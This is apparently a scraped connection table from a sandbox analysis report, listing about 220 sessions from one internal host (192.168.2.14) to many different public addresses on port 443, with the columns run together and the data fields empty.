                                      11649192.168.2.1447534182.70.108.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11650192.168.2.1438154187.176.24.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11651192.168.2.145120850.240.161.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11652192.168.2.1446392173.37.207.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11653192.168.2.1435128166.174.114.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11654192.168.2.145288453.171.104.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11655192.168.2.1450634149.215.8.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11656192.168.2.145918653.197.1.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11657192.168.2.145222032.252.12.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11658192.168.2.143978467.158.189.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11659192.168.2.1440840112.114.92.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11660192.168.2.1441786119.135.107.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11661192.168.2.1439372107.194.127.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11662192.168.2.146020470.162.141.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11663192.168.2.143502282.96.167.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11664192.168.2.144649895.117.95.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11665192.168.2.144902053.60.238.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11666192.168.2.145444893.65.89.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11667192.168.2.145261688.76.32.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11668192.168.2.143882657.180.203.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11669192.168.2.1442840164.104.88.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11670192.168.2.1438412181.45.198.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11671192.168.2.1440122117.241.65.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11672192.168.2.143639820.130.96.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11673192.168.2.1439896198.122.30.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11674192.168.2.144736885.245.124.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11675192.168.2.1454588157.221.253.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11676192.168.2.1454656146.15.167.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11677192.168.2.144791017.171.124.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11678192.168.2.1434410179.89.176.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11679192.168.2.143434891.28.230.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11680192.168.2.145053092.157.192.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11681192.168.2.144124088.253.221.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11682192.168.2.145498641.214.100.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11683192.168.2.143452885.98.43.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11684192.168.2.144735837.248.2.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11685192.168.2.1436186191.206.245.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11686192.168.2.14340964.173.64.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11687192.168.2.1437610140.82.246.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11688192.168.2.1433420153.185.146.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11689192.168.2.144339889.244.32.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11690192.168.2.145499285.85.153.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11691192.168.2.1455630115.26.40.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11692192.168.2.1440364162.246.139.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11693192.168.2.145873641.238.246.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11694192.168.2.143375817.63.19.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11695192.168.2.144997681.114.65.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11696192.168.2.1439430197.221.60.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11697192.168.2.1448226138.105.189.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11698192.168.2.145563297.178.137.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11699192.168.2.1433650163.123.7.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11700192.168.2.143591623.23.227.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11701192.168.2.14498085.90.64.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11702192.168.2.145829250.102.161.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11703192.168.2.1433388150.108.29.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11704192.168.2.144548225.207.247.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11705192.168.2.1432812211.146.25.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11706192.168.2.1448972131.115.168.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11707192.168.2.1453558185.136.3.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11708192.168.2.1439282136.43.212.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11709192.168.2.1446770136.82.26.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11710192.168.2.1460608111.109.50.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11711192.168.2.145628452.82.94.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11712192.168.2.1444064176.110.181.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11713192.168.2.1437036111.123.244.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11714192.168.2.1455214105.223.4.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11715192.168.2.145271213.43.134.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11716192.168.2.1434770168.151.225.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11717192.168.2.1434920119.33.253.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11718192.168.2.1454574159.193.38.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11719192.168.2.1448684120.179.24.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11720192.168.2.1437030123.181.93.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11721192.168.2.1453778128.237.241.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11722192.168.2.1447190111.217.98.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11723192.168.2.1449308180.12.11.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11724192.168.2.144363678.81.74.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11725192.168.2.1459024167.80.46.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11726192.168.2.14548342.51.223.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11727192.168.2.1436642116.22.225.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11728192.168.2.1450474165.189.108.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11729192.168.2.1450144103.246.185.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11730192.168.2.144067649.17.231.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11731192.168.2.1446818138.209.81.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11732192.168.2.144128289.37.176.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11733192.168.2.144414471.151.131.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11734192.168.2.1452402150.196.190.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11735192.168.2.1435370156.152.178.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11736192.168.2.1439508152.171.193.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11737192.168.2.145270658.193.27.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11738192.168.2.1442044180.92.113.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11739192.168.2.1443792199.134.149.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11740192.168.2.145069057.97.25.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11741192.168.2.1451318147.232.130.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11742192.168.2.143884268.151.63.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11743192.168.2.1457118113.123.96.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11744192.168.2.1455444195.147.47.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11745192.168.2.1453428163.88.156.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11746192.168.2.1447006170.44.78.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11747192.168.2.1454728134.141.120.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11748192.168.2.1441776183.141.98.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11749192.168.2.1445184171.242.165.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11750192.168.2.143381081.130.185.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11751192.168.2.145108468.239.214.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11752192.168.2.145629692.223.169.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11753192.168.2.1455970154.65.254.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11754192.168.2.143801239.151.191.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11755192.168.2.1443658189.7.166.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11756192.168.2.1436888210.63.76.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11757192.168.2.145489862.0.130.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11758192.168.2.145744825.249.163.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11759192.168.2.1438312133.86.170.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11760192.168.2.143794445.16.5.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11761192.168.2.144121898.99.168.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11762192.168.2.143585681.183.199.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11763192.168.2.144556070.190.75.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11764192.168.2.1445220171.200.201.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11765192.168.2.1460502151.66.152.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11766192.168.2.1455690170.89.158.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11767192.168.2.1434886162.194.222.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11768192.168.2.144800299.0.91.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11769192.168.2.1445956138.220.78.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11770192.168.2.1448708195.90.97.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11771192.168.2.1434222120.61.227.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11772192.168.2.144957832.148.204.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11773192.168.2.144380638.11.53.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11774192.168.2.1448050118.88.44.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11775192.168.2.1436268209.220.211.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11776192.168.2.145698481.134.215.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11777192.168.2.1449074116.114.39.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11778192.168.2.145057467.147.28.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11779192.168.2.1440666191.72.58.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11780192.168.2.1453306181.13.51.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11781192.168.2.145781283.137.85.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11782192.168.2.1433730106.174.89.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11783192.168.2.145048275.161.149.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11784192.168.2.1436098109.143.238.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11785192.168.2.1448008185.232.119.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11786192.168.2.144859025.2.69.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11787192.168.2.143331463.130.37.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11788192.168.2.1435320187.108.156.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11789192.168.2.1455196143.55.200.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11790192.168.2.1456940130.189.13.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11791192.168.2.144311227.86.102.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11792192.168.2.1460052221.210.161.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11793192.168.2.1447084119.6.49.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11794192.168.2.145073492.25.100.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11795192.168.2.145534269.18.41.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11796192.168.2.1440766201.52.241.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11797192.168.2.145367696.59.66.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11798192.168.2.145483293.253.226.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11799192.168.2.143386223.138.252.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11800192.168.2.1456642152.241.218.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11801192.168.2.1439816223.32.4.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11802192.168.2.1460294220.75.167.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11803192.168.2.145213078.126.234.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11804192.168.2.1435716165.251.190.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11805192.168.2.1433004208.147.124.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11806192.168.2.143307869.137.215.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11807192.168.2.145710074.54.214.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11808192.168.2.144975463.39.20.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11809192.168.2.1433064205.244.244.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11810192.168.2.1435990179.240.146.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11811192.168.2.145108897.81.142.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11812192.168.2.1447590221.47.228.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11813192.168.2.1458922192.15.87.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11814192.168.2.1436396131.42.181.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11815192.168.2.1455384120.101.136.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11816192.168.2.1434288100.132.218.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11817192.168.2.145103653.82.52.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11818192.168.2.144315496.149.145.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11819192.168.2.144462831.152.62.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11820192.168.2.143391843.206.88.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11821192.168.2.1445430180.190.145.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11822192.168.2.1460682133.228.167.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11823192.168.2.1441134196.172.99.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11824192.168.2.1447320110.166.224.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11825192.168.2.145118225.242.51.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11826192.168.2.1452956138.219.218.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11827192.168.2.1450816157.43.36.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11828192.168.2.1460600146.133.231.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11829192.168.2.14608248.79.111.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11830192.168.2.1444958105.161.204.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11831192.168.2.1434410216.111.149.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11832192.168.2.145937659.80.246.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11833192.168.2.144151282.124.204.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11834192.168.2.1459086105.94.63.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11835192.168.2.145808825.42.26.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11836192.168.2.145009464.244.29.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11837192.168.2.1451444147.115.121.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11838192.168.2.144952440.6.151.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11839192.168.2.144252480.184.107.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11840192.168.2.1443702202.192.87.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11841192.168.2.1454012159.44.241.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11842192.168.2.145918239.235.53.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11843192.168.2.1451740156.95.37.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11844192.168.2.1453452154.14.187.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11845192.168.2.146036443.62.115.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11846192.168.2.1451814195.123.68.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11847192.168.2.144695064.242.176.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11848192.168.2.1442060122.26.243.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11849192.168.2.1434686116.40.61.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11850192.168.2.1447358187.185.104.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11851192.168.2.145600034.39.110.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11852192.168.2.1442248139.170.90.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11853192.168.2.1445304197.255.21.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11854192.168.2.143317241.80.32.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11855192.168.2.1449774181.174.182.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11856192.168.2.1448442211.26.87.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11857192.168.2.1435782172.61.197.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11858192.168.2.143626862.48.202.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11859192.168.2.1437974162.11.108.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11860192.168.2.145071659.181.2.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11861192.168.2.145410045.12.102.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11862192.168.2.143303834.98.199.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11863192.168.2.143775697.133.196.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11864192.168.2.1445164205.201.73.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11865192.168.2.14387008.8.201.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11866192.168.2.143912827.146.197.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11867192.168.2.144101073.58.171.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11868192.168.2.1444204210.199.187.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11869192.168.2.1453226183.195.177.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11870192.168.2.1446482126.113.210.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
